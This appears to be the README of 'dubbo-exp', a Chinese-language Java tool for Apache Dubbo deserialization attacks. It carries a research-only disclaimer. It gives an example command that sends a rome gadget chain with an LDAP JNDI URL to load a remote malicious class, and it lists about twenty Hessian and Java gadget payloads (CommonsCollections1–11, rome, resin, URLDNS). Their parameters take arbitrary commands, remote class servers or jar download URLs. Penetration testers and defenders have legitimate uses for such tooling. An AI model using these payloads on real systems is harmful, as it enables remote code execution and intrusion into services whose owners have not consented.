/dubbo-exp

Dubbo反序列化测试工具

Primary LanguageJava

工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责

Dubbo反序列化测试工具

usage: java -jar exp.jar [OPTION]

  • -h 帮助信息
  • -list 输出所有payload信息
  • -p payload名称
  • -param payload入参
  • -protocol [dubbo] 通讯协议名称,默认缺省dubbo
  • -s [hessian|java] 序列化类型,默认缺省hessian
  • -t 目标,例:127.0.0.1:20880

例:

java -jar dubbo-exp.jar
-t
127.0.0.1:20881
-protocol
dubbo
-s
hessian
-p
rome
-param
ldap://127.0.0.1:43658/Calc

payloads列表

  1. 名称:resin
  2. 需要入参数量:2
  3. 参数说明:arg[0]=恶意类所在web服务器ip,arg[1]=恶意类类名,此处需要恶意类无包名编译出来的
  4. 序列化类型:hessian
  5. 依赖:com.caucho:quercus:*
  1. 名称:rome
  2. 需要入参数量:1
  3. 参数说明:arg[0]=ldap引用外部class地址,例:ldap://127.0.0.1:43658/Calc(ldap协议的JNDI服务可打jdk8u191及以下版本,大于jdk8u191需要使用gadget字节码)
  4. 序列化类型:hessian
  5. 依赖:com.rometools:rome:*
  1. 名称:spring-aop
  2. 需要入参数量:1
  3. 参数说明:arg[0]=ldap引用外部class地址,例:ldap://127.0.0.1:43658/Calc(ldap协议的JNDI服务可打jdk8u191及以下版本,大于jdk8u191需要使用gadget字节码)
  4. 序列化类型:hessian
  5. 依赖:org.springframework:spring-aop
  1. 名称:xbean
  2. 需要入参数量:2
  3. 参数说明:arg[0]=恶意类所在web服务器ip,arg[1]=恶意类类名,此处需要恶意类无包名编译出来的
  4. 序列化类型:hessian
  5. 依赖:org.apache.xbean:xbean-naming:*
  1. 名称:CommonsBeanutils
  2. 需要入参数量:1
  3. 参数说明:arg[0]=ldap引用外部class地址,例:ldap://127.0.0.1:43658/Calc(ldap协议的JNDI服务可打jdk8u191及以下版本,大于jdk8u191需要使用gadget字节码)
  4. 序列化类型:java
  5. 依赖:
  1. 名称:CommonsBeanutils1
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:commons-beanutils:commons-beanutils:1.9.2
  1. 名称:CommonsCollections1
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.1
  1. 名称:CommonsCollections2
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:org.apache.commons:commons-collections4:4.0
  1. 名称:CommonsCollections3
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.1
  1. 名称:CommonsCollections3ForLoadJar
  2. 需要入参数量:2
  3. 参数说明:arg[0]=jar包下载地址,arg[1]=jar包中恶意类名称
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.1
  1. 名称:CommonsCollections4
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.1
  1. 名称:CommonsCollections5
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.1
  1. 名称:CommonsCollections5ForLoadJar
  2. 需要入参数量:2
  3. 参数说明:arg[0]=jar包下载地址,arg[1]=jar包中恶意类名称
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.1
  1. 名称:CommonsCollections6
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.1
  1. 名称:CommonsCollections6ForLoadJar
  2. 需要入参数量:2
  3. 参数说明:arg[0]=jar包下载地址,arg[1]=jar包中恶意类名称
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.1
  1. 名称:CommonsCollections7
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.1
  1. 名称:CommonsCollections8
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:org.apache.commons:commons-collections4:4.0
  1. 名称:CommonsCollections9
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.1
  1. 名称:CommonsCollections10
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.1
  1. 名称:CommonsCollections11
  2. 需要入参数量:1
  3. 参数说明:arg[0]=cmd
  4. 序列化类型:java
  5. 依赖:commons-collections:commons-collections:3.2.1
  1. 名称:URLDNS
  2. 需要入参数量:1
  3. 参数说明:arg[0]=dns server url
  4. 序列化类型:java
  5. 依赖: